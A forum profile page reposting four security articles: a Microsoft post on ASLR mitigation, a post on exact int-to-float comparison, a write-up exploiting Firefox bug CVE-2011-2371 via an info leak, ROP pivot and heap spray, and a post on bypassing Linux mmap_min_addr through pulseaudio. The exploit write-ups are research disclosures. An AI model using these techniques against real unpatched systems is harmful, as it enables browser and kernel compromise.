Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. swiat 12 Mar 2014 9:13 AM We wrote several times in this blog about the importance of enabling Address Space Layout Randomization mitigation (ASLR) in modern software because it’s a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today’s blog, we’ll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs not equipped with ASLR yet. Born with ASLR ASLR mitigation adds a significant component in exploit development, but we realized that sometimes a single module without ASLR loaded in a program can be enough to compromise all the benefits at once. For this reason recent versions of most popular Microsoft programs were natively developed to enforce ASLR automatically for every module loaded into the process space. In fact Internet Explorer 10/11 and Microsoft Office 2013 are designed to run with full benefits of this mitigation and they enforce ASLR randomization natively without any additional setting on Win7 and above, even for those DLLs not originally compiled with /DYNAMICBASE flag. So, customers using these programs have already a good native protection and they need to take care only of other programs potentially targeted by exploits not using ASLR. ASLR effectiveness in action Given the importance of ASLR, we are taking additional efforts to close gaps when ASLR bypasses arise in security conferences from time to time or when they are found in-the-wild used in targeted attacks. The outcome of this effort is to strength protection also for previous versions of Microsoft OS and browser not able to enforce ASLR natively as IE 10/11 and Office 2013 can do. Some examples of recent updates designed to break well-known ASLR bypasses are showed in the following table. [TABLE=width: 624] [TR] [TD=width: 96] MS BULLETIN [/TD] [TD=width: 192] ASLR BYPASS [/TD] [TD=width: 342] REFERENCE [/TD] [/TR] [TR] [TD=width: 96] MS13-063 [/TD] [TD=width: 192] LdrHotPatchRoutine [/TD] [TD=width: 342] Ref: http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf Reported in Pwn2Own 2013, works only for Win7 x64 [/TD] [/TR] [TR] [TD=width: 96] MS13-106 [/TD] [TD=width: 192] HXDS.DLL (Office 2007/2010) [/TD] [TD=width: 342] Ref: http://www.greyhathacker.net/?p=585 Seen used in-the-wild with IE/Flash exploits (CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792) [/TD] [/TR] [TR] [TD=width: 96] MS14-009 [/TD] [TD=width: 192] VSAVB7RT.DLL (.NET) [/TD] [TD=width: 342] Ref: http://www.greyhathacker.net/?p=585 Seen used in-the-wild with IE exploits (CVE-2013-3893) [/TD] [/TR] [/TABLE] We were glad to see the return of these recent ASLR updates in two recent attacks: the Flash exploit found in February (CVE-2014-0502) in some targeted attacks and a privately reported bug for IE8 (CVE-2014-0324) just patched today. As showed from the code snippets below, the two exploits would not have been effective against fully patched machines with MS13-106 update installed running Vista or above. [TABLE=width: 630] [TR] [TD=width: 362] [/TD] [TD=width: 261] Exploit code for CVE-2014-0502 (Flash) Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106. NOTE: the code attempts also a second ASLR bypass based on Java 1.6.x [/TD] [/TR] [TR] [TD=width: 362] [/TD] [TD=width: 261] Exploit code for CVE-2014-0324 (IE8) Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106. [/TD] [/TR] [/TABLE] Solutions for non-ASLR modules The two exploit codes above shows another important lesson: even if Microsoft libraries are compiled natively with ASLR and even if we work hard to fix known ASLR gaps for our products, there are still opportunities for attackers in using third-party DLLs to tamper the ASLR ecosystem. The example of Java 1.6.x is a well-known case: due to the popularity of this software suite and due to the fact that it loads an old non-ASLR library into the browser (MSVCR71.DLL), it became a very popular vector used in exploits to bypass ASLR. In fact, security researchers are frequently scanning for popular 3rd party libraries not compiled with /DYNAMICBASE that can allow a bypass; the following list is just an example of few common ones. [TABLE=width: 525] [TR] [TD=width: 252] 3rd PARTY ASLR BYPASS [/TD] [TD=width: 378] REFERENCE [/TD] [/TR] [TR] [TD=width: 252] Java 1.6.x (MSVCR71.DLL) [/TD] [TD=width: 378] Very common ASLR bypass used in-the-wild for multiple CVEs NOTE: Java 1.7.x uses MSVCR100.DLL which supports ASLR [/TD] [/TR] [TR] [TD=width: 252] DivX Player 10.0.2 Yahoo Messenger 11.5.0.228 AOL Instant Messenger 7.5.14.8 [/TD] [TD=width: 378] Ref: http://www.greyhathacker.net/?p=756 (not seen in real attacks) [/TD] [/TR] [TR] [TD=width: 252] DropBox [/TD] [TD=width: 378] Ref:http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/ (not seen in real attacks) [/TD] [/TR] [TR] [TD=width: 252] veraport20.Veraport20Ctl Gomtvx.Launcher INIUPDATER.INIUpdaterCtrl [/TD] [TD=width: 378] Ref: KISA report http://boho.or.kr/upload/file/EpF448.pdf (seen in-the-wild with CVE-2013-3893) [/TD] [/TR] [/TABLE] As noted at beginning of this blog, Internet Explorer 10/11 and Office 2013 are not affected by ASLR bypasses introduced by 3rd party modules and plugins. Instead, customers still running older version of Internet Explorer and Office can take advantage of two effective tools that can be used to enforce ASLR mitigation for any module: EMET (Enhanced Mitigation Experience Toolkit): can be used to enable system-wide ASLR or “MandatoryASLR” selectively on any process; “Force ASLR” update KB2639308: makes possible for selected applications to forcibly relocate images not built with /DYNAMICBASE using Image File Execution Options (IFEO) registry keys; Conclusions ASLR bypasses do not represent vulnerabilities, since they have to be combined with a real memory corruption vulnerability in order to allow attackers to create an exploit, however it's nice to see that closing ASLR bypasses can negatively impact the reliability of certain targeted attacks. We encourage all customers to proactively test and deploy the suggested tools when possible, especially for old programs commonly targeted by memory corruption exploits. We expect that attackers will continue increasing their focus and research on more sophisticated ASLR bypasses which rely on disclosure of memory address rather than non-ASLR libraries. - Elia Florio, MSRC Engineering Sursa: When ASLR makes the difference - Security Research & Defense - Site Home - TechNet Blogs
  2. [h=2]The perfect int == float comparison[/h]Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some other) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using. UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed. The problem explained Let's start by demonstrating a the problem by running the following code that compares subsequent integers with a floating point value: float a = 100000000.0f; printf("...99 --> %i\n", a == 99999999); printf("...00 --> %i\n", a == 100000000); printf("...01 --> %i\n", a == 100000001); printf("...02 --> %i\n", a == 100000002); printf("...03 --> %i\n", a == 100000003); printf("...04 --> %i\n", a == 100000004); printf("...05 --> %i\n", a == 100000005); The result: ...99 --> 1 ...00 --> 1 ...01 --> 1 ...02 --> 1 ...03 --> 1 ...04 --> 1 ...05 --> 0 Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic. Let's look at another example - an attempt to sort a collection of numbers by value in PHP: <?php $x = array( 20000000000000002, 20000000000000003, 20000000000000000.0, ); sort($x); foreach ($x as $i) { if (is_float($i)) { printf("%.0f\n", $i); } else { printf("%i\n", $i); } } The "sorted" result (64-bit PHP): > php test.php 20000000000000002 20000000000000000 20000000000000003 Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32-bit, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output: 20000000000000000 20000000000000000 20000000000000004 So, what's going on? It all boils down to floats having to little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will get truncated - i.e. the least significant bits will be treated as zeroes. In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented: 0b101111101011110000100000001 However, since only the leading "1" and following 23-bits will fit inside a float, the "1" at the very end gets truncated. Therefore, this number actually becomes another number: 0b101111101011110000100000000 Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f. Same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated for storing the value. A somewhat amusing side note Actually, it gets even better. Let's re-write the first code shown above (the C one) to use a loop: float a = 100000000.0f; int i; for(i = 100000000 - 5; i <= 100000000 + 5; i++) { printf("%11.1f == %9u --> %i\n", a, i, a == i); } As you can see, there are no big changes. Now let's compile it and run it: >gcc test.c > a 100000000.0 == 99999995 --> 0 100000000.0 == 99999996 --> 0 100000000.0 == 99999997 --> 0 100000000.0 == 99999998 --> 0 100000000.0 == 99999999 --> 0 100000000.0 == 100000000 --> 1 100000000.0 == 100000001 --> 0 100000000.0 == 100000002 --> 0 100000000.0 == 100000003 --> 0 100000000.0 == 100000004 --> 0 100000000.0 == 100000005 --> 0 The result is magically correct! How about we compile it with optimization then? >gcc test.c -O3 > a 100000000.0 == 99999995 --> 0 100000000.0 == 99999996 --> 1 100000000.0 == 99999997 --> 1 100000000.0 == 99999998 --> 1 100000000.0 == 99999999 --> 1 100000000.0 == 100000000 --> 1 100000000.0 == 100000001 --> 1 100000000.0 == 100000002 --> 1 100000000.0 == 100000003 --> 1 100000000.0 == 100000004 --> 1 100000000.0 == 100000005 --> 0 Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways: Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime. Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar). The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80-bits, though you can change this) - so the 32-bit integer isn't truncated on load, as it would happen if it gets converted explicitly to a 32-bit float (which, again, has only 24-bits for the actual value). Which option is selected depends strictly on the compiler - it's mood, version, options used at compilation, etc. The perfect comparison Of course, it's possible to do a perfect comparison. The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - double has large enough significand to store all possible 32-bit int values. And for the 64-bit integers you can use the 80-bit long double which has exactly 64 bits dedicated for storing the value (plus the ever-present "1"). But that's too easy. Let's try to do the actual comparison without converting to larger types. This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below. UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>). The mathematical way We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with: 1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such case this might happen and we wouldn't be able to catch it after the conversion, so we need to deal with it sooner. 2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either. The implementation of this method (with some comments) is presented below: bool IntFloatCompare(int i, float f) { // Simple case. if ((float)i != f) return false; // Note: The constant used here CAN be represented as a float. Normally // you would want to use INT_MAX here instead, but that value // *cannot* be represented as a float. const float TooBigForInt = (float)0x80000000u; if (f >= TooBigForInt) { return false; } if (f < -TooBigForInt) { return false; } float ft = truncf(f); if (ft != f) { // Not an integer. return false; } // It should be safe to cast float to integer now. int fi = (int)f; return fi == i; } The encoding-specific way This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page. bool IntFloatCompareBinary(int i, float f) { uint32_t fu32; memcpy(&fu32, &f, 4); uint32_t sign = fu32 >> 31; uint32_t exp = (fu32 >>23) & 0xff; uint32_t frac = fu32 & 0x7fffff; // NaN? Inf? if (exp == 0xff) { return false; } // Subnormal representation? if (exp == 0) { // Check if fraction is 0. If so, it's true if "i" is 0 as well. // Otherwise it's false in all cases. return (frac == 0 && i == 0); } int exp_decoded = (int)exp - 127; // If exponent is negative, the number has a fraction part, which means it's not equal. if (exp_decoded < 0) { return false; } // If exponenta is above or equal to 31, int cannot represent so big numbers. if (exp_decoded > 31) { return false; } // There is one case where exp_decoded equal to 31 makes sens - when float is // equal to INT_MIN, i.e. sign is - and fraction part is 0. if (exp_decoded == 31 && (sign != 1 || frac != 0)) { return false; } // What is left is in range of integer, but still can have a fraction part. // Check if any fraction part will be left. uint32_t value_frac = (frac << exp_decoded) & 0x7fffff; if (value_frac != 0) { return false; } // Check the value. int value = (1 << 23) | frac; int shift_diff = exp_decoded - 23; if (shift_diff <0) { value >>= -shift_diff; } else { value <<= shift_diff; } if (sign) { value = -value; } return i == value; } Summary The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators which then could be used to fix the PHP sorting example. But... seriously, just cast the integer and float to something that has more precision ;> P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers. Sursa: gynvael.coldwind//vx.log
  3. [h=2]Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules[/h]22/02/2012 pakt CVE-2011-2371 (found by Chris Rohlf and Yan Ivnitskiy) is a bug in Firefox versions <= 4.0.1. It has an interesting property of being a code-exec and an info-leak bug at the same time. Unfortunately, all public exploits targeting this vulnerability rely on non-ASLR modules (like those present in Java). In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Window 7, by leaking imagebase of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies. [h=2]The bug[/h] You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger: xyz = new Array; xyz.length = 0x80100000; a = function foo(prev, current, index, array) { current[0] = 0x41424344; } xyz.reduceRight(a,1,2,3); Executing it crashes Firefox: eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208 eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mozjs!JS_FreeArenaPool+0x15e1: 004f0be1 8b14c8 mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=???????? eax holds a pointer to “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of given array in reverse order, so if the read @ 004f0be1 succeeds and we won’t crash inside the callback function (foo), JS interpreter will loop the above code with decreasing values in ecx. Value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before of after the array, by setting/clearing the 29th bit of length. Neat . During reduceRight(), the interpreter expects jsval_layout unions: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 274 typedef union jsval_layout 275 { 276 uint64 asBits; 277 struct { 278 union { 279 int32 i32; 280 uint32 u32; 281 JSBool boo; 282 JSString *str; 283 JSObject *obj; 284 void *ptr; 285 JSWhyMagic why; 286 jsuword word; 287 } payload; 288 JSValueTag tag; 289 } s; 290 double asDouble; 291 void *asPtr; 292 } jsval_layout; To be more specific, we are interested in the “payload” struct. Possible values for “tag” are: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 92 JS_ENUM_HEADER(JSValueType, uint8) 93 { 94 JSVAL_TYPE_DOUBLE = 0x00, 95 JSVAL_TYPE_INT32 = 0x01, 96 JSVAL_TYPE_UNDEFINED = 0x02, 97 JSVAL_TYPE_BOOLEAN = 0x03, 98 JSVAL_TYPE_MAGIC = 0x04, 99 JSVAL_TYPE_STRING = 0x05, 100 JSVAL_TYPE_NULL = 0x06, 101 JSVAL_TYPE_OBJECT = 0x07, ... 119 JS_ENUM_HEADER(JSValueTag, uint32) 120 { 121 JSVAL_TAG_CLEAR = 0xFFFF0000, 122 JSVAL_TAG_INT32 = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, 123 JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED, 124 JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, 125 JSVAL_TAG_BOOLEAN = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN, 126 JSVAL_TAG_MAGIC = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC, 127 JSVAL_TAG_NULL = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL, 128 JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT 129 } JS_ENUM_FOOTER(JSValueTag); Does it mean we can only read first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no. Observe how the interpreter checks if a jsval_layout is a number: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 405 static JS_ALWAYS_INLINE JSBool 406 JSVAL_IS_NUMBER_IMPL(jsval_layout l) 407 { 408 JSValueTag tag = l.s.tag; 409 JS_ASSERT(tag != JSVAL_TAG_CLEAR); 410 return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET; So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number. This isn’t the end of good news, check how doubles are recognized: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 369 static JS_ALWAYS_INLINE JSBool 370 JSVAL_IS_DOUBLE_IMPL(jsval_layout l) 371 { 372 return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR; 373 } This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff 0000 0000 0000 0000 isn’t really a problem — we are just throwing out NaNs. [h=2]Leaking the image base[/h] Knowing that most of values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences. var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); //decode with JSPack later } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; //stop dumping } } Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_value of type OBJECT, manipulating it later will cause an undesired crash. Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in .code section, or pointers to data structures in .data, but how to find them? After all, they change with every run, because of varying image base. By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to .data section, differing by a constant (0×304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0×304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va – ptr_rva). It’s a heuristic, but it works 100% of the time . [h=2]Taking control[/h] Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1? if the “payload.ptr” field points to an area filled with \x88: eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888 eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0 ov up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06 mozjs!js::mjit::stubs::SetElem$lt;0>+0xf9: 655301a9 8b4764 mov eax,dword ptr [edi+64h] ds:002b:888888ec=???????? 0:000> k ChildEBP RetAddr 0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567] 0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619] 0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857] 0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932] We are using \x88 as a filler, so that every pointer taken from that area is equal to 0×88888888. Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped . It seems like we can control the value of edi. Let’s see if it’s of any use: 0:000> u eip l10 mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]: 655301a9 8b4764 mov eax,dword ptr [edi+64h] 655301ac 85c0 test eax,eax 655301ae 7505 jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5) 655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30) 655301b5 8b54241c mov edx,dword ptr [esp+1Ch] 655301b9 6a00 push 0 655301bb 8d4c2424 lea ecx,[esp+24h] 655301bf 51 push ecx 655301c0 53 push ebx 655301c1 55 push ebp 655301c2 52 push edx 655301c3 ffd0 call eax 655301c5 83c414 add esp,14h 655301c8 85c0 test eax,eax That’s exactly what we need — value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3. Where does edi value come from? 0:000> u eip-72 l10 mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]: 65530137 8b7d04 mov edi,dword ptr [ebp+4] 6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0) 65530140 8b5c2414 mov ebx,dword ptr [esp+14h] 65530144 7563 jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9) edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union. It’s now easy to see how to control EIP. Trigger setElem on a controlled jsval_layout union (by executing “current[0]=1? in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT, and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy . Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP. !mona rop -m "mozjs" -rva “-m” restricts search to just mozjs.dll (that’s the only module with known image base) “-rva” generates a chain parametrized by module’s image base. I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX. There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to layout.ptr field in our fake object. First idea is to use any function’s epilogue: mov esp, ebp pop ebp ret as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since: 65530137 8b7d04 mov edi,dword ptr [ebp+4] that would mean [ebp+4] has to be a return address and a pointer to a function pointer called later @ 655301c3. We have to modify EBP before copying it to ESP. Noticing that during SetElem, property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget: // 0x68e7a21c, mozjs.dll // found with mona.py ADD EBP,EBX PUSH DS POP EDI POP ESI POP EBX MOV ESP,EBP //(1) POP EBP //(2) RETN This will offset EBP by a controlled ODD value. Unicode chars in JS have two byte chars, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with new EBP value popped @ (2) and executing the same gadget from line (1). This is how our fake object has to look like: +------------+ | | 9 13 17 v------------+----------------------------------------------------------------------+ |pivot_va | ptr | 00,new_ebp,mov_esp_ebp,00 | new_ebp2 | ROP ... normal shellcode ... +-----------------------+-----------------------------------------------------------+ 0 4 8 | 18 22 | ^ | | +-------------------+ pivot_va – address of the gadget above new_ebp – value popped at (2) used to realign the stack to 2 mov_esp_ebp – address of (1) new_ebp2 – new value of EBP after executing (2) for the second time, not used ROP – generated ROP chain changing memory perms normal shellcode – message box shellcode by Skylined [h=2]Spraying[/h] Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory: low addresses +---------------------+ +-------+ ptr | 0xffff0007 | ^ | +---------------------| | | | | | | | . | | | | . | | | | . | | | +---------------------| | half1 | +----+ ptr | 0xffff0007 | | | | +---------------------| | | | | . | | | | | . | | | | | . | | | | | | v | | +-----end of half1----+ | | | | ^ | | | | | | | | | | margin of | | | . | | error | | | . | | | | +---------------------+ v +--|---> fake object | | +--^------------------+ | | | . | | | | . | +-----+ | | | | | +---------------------+ high addresses Our spray will consist of two regions. First one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with fake objects described above. If you run the PoC exploit on Windows XP, this is how (most likely) the heap is going to look like: Zooming into of the 1MB chunks: Notice how our payload is aligned to 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. Beginning of the array is used to store metadata, and the actual data starts @ +4KB. It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes and, in effect, allocating too much memory for objects (including strings), so instead of nicely aligned strings in array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec.). This is how the fake objects from the second part of spray look like: Four NOPs at the bottom mark the end of mona’s ROP chain. [h=2]Putting it all together[/h] Leak mozjs’ image base, as described above. Spray the heap with JS, as described above. Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating array’s length used in reduceRight(). Calculate the length of the array (xyz in the trigger PoC) so that the first dereference should happen in the middle of first half of the spray. Aiming at the middle gives us the biggest possible margin of error — if the spray’s starting address deviates from expected value by less than size/2, it shouldn’t affect our exploit. Trigger the bug. Inside JS callback, trigger SetElem, by executing “current[4]=1?. In case of a JS exception (TypeError: current is undefined), change array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing . See a nice messagebox, confirming success [h=2]Limitations[/h] PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes). Assuming that the PoC is the first and only page opened in Firefox, probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region. Get the PoC here. Sursa: Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules | GDTR
  4. [h=3]Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)[/h] EDIT3: Slashdot, the SANS Institute, Threatpost and others have a story about an exploit by Bradley Spengler which uses our technique to exploit a null pointer dereference in the Linux kernel. EDIT2: As of July 13th 2009, the Linux kernel integrates our patch (2.6.31-rc3). Our patch also made it into -stable. EDIT1: This is now referenced as a vulnerability and tracked as CVE-2009-1895 NULL pointers dereferences are a common security issue in the Linux kernel. In the realm of userland applications, exploiting them usually requires being able to somehow control the target's allocations until you get page zero mapped, and this can be very hard. In the paradigm of locally exploiting the Linux kernel however, nothing (before Linux 2.6.23) prevented you from mapping page zero with mmap() and crafting it to suit your needs before triggering the bug in your process' context. Since the kernel's data and code segment both have a base of zero, a null pointer dereference would make the kernel access page zero, a page filled with bytes in your control. Easy. This used to not be the case, back in Linux 2.0 when the kernel's data segment's base was above PAGE_OFFSET and the kernel had to explicitely use a segment override (with the fs selector) to access data in userland. The same rough idea is now used in PaX/GRSecurity's UDEREF to prevent exploitation of "unexpected to userland kernel accesses" (it actually makes use of an expand down segment instead of a PAGE_OFFSET segment base, but that's a detail). Kernel developpers tried to solve this issue too, but without resorting to segmentation (which is considered deprecated and is mostly not available on x86_64) and in a portable (cross architectures) way. In 2.6.23, they introduced a new sysctl, called vm.mmap_min_addr, that defines the minimum address that you can request a mapping at. Of course, this doesn't solve the complete issue of "to userland pointer dereferences" and it also breaks the somewhat useful feature of being able to map the first pages (this breaks Dosemu for instance), but in practice this has been effective enough to make exploitation of many vulnerabilities harder or impossible. Recently, Tavis Ormandy and myself had to exploit such a condition in the Linux kernel. We investigated a few ideas, such as: using brk() creating a MAP_GROWSDOWN mapping just above the forbidden region (usually 64K) and segfaulting the last page of the forbidden region obscure system calls such as remap_file_pages putting memory pressure in the address space to let the kernel allocate in this region using the MAP_PAGE_ZERO personality All of them without any luck at first. The LSM hook responsible for this security check was correctly called every time. So what does the default security module do in cap_file_mmap? This is the relevant code (in security/capability.c on recent versions of the Linux kernel): if ((addr < mmap_min_addr) && !capable(CAP_SYS_RAWIO)) return -EACCES; return 0; Meaning that a process with CAP_SYS_RAWIO can bypass this check. How can we get our process to have this capability ? By executing a setuid binary of course! So we set the MMAP_PAGE_ZERO personality and execute a setuid binary. Page zero will get mapped, but the setuid binary is executing and we don't have control anymore. So, how do we get control back ? Using something such as "/bin/su our_user_name" could be tempting, but while this would indeed give us control back, su will drop privileges before giving us control back (it'd be a vulnerability otherwise!), so the Linux kernel will make exec fail in the cap_file_mmap check (due to the MMAP_PAGE_ZERO personality). So what we need is a setuid binary that will give us control back without going through exec. We found such a setuid binary that is installed on many Desktop Linux machines by default: pulseaudio. pulseaudio will drop privileges and let you specify a library to load though its -L argument. Exactly what we needed! Once we have one page mapped in the forbidden area, it's game over. Nothing will prevent us from using mremap to grow the area and mprotect to change our access rights to PROT_READ|PROT_WRITE|PROT_EXEC. So this completely bypasses the Linux kernel's protection. Note that apart from this problem, the mere fact that MMAP_PAGE_ZERO is not in the PER_CLEAR_ON_SETID mask and thus is allowed when executing setuid binaries can be a security issue: being able to map page zero in a process with euid=0, even without controlling its content could be useful when exploiting a null pointer vulnerability in a setuid application. We believe that the correct fix for this issue is to add MMAP_PAGE_ZERO to the PER_CLEAR_ON_SETID mask. PS: Thanks to Robert Swiecki for some help while investigating this. Posted by Julien Tinnes at 11:37 AM Sursa: cr0 blog: Bypassing Linux' NULL pointer dereference exploit prevention (mmap_min_addr)
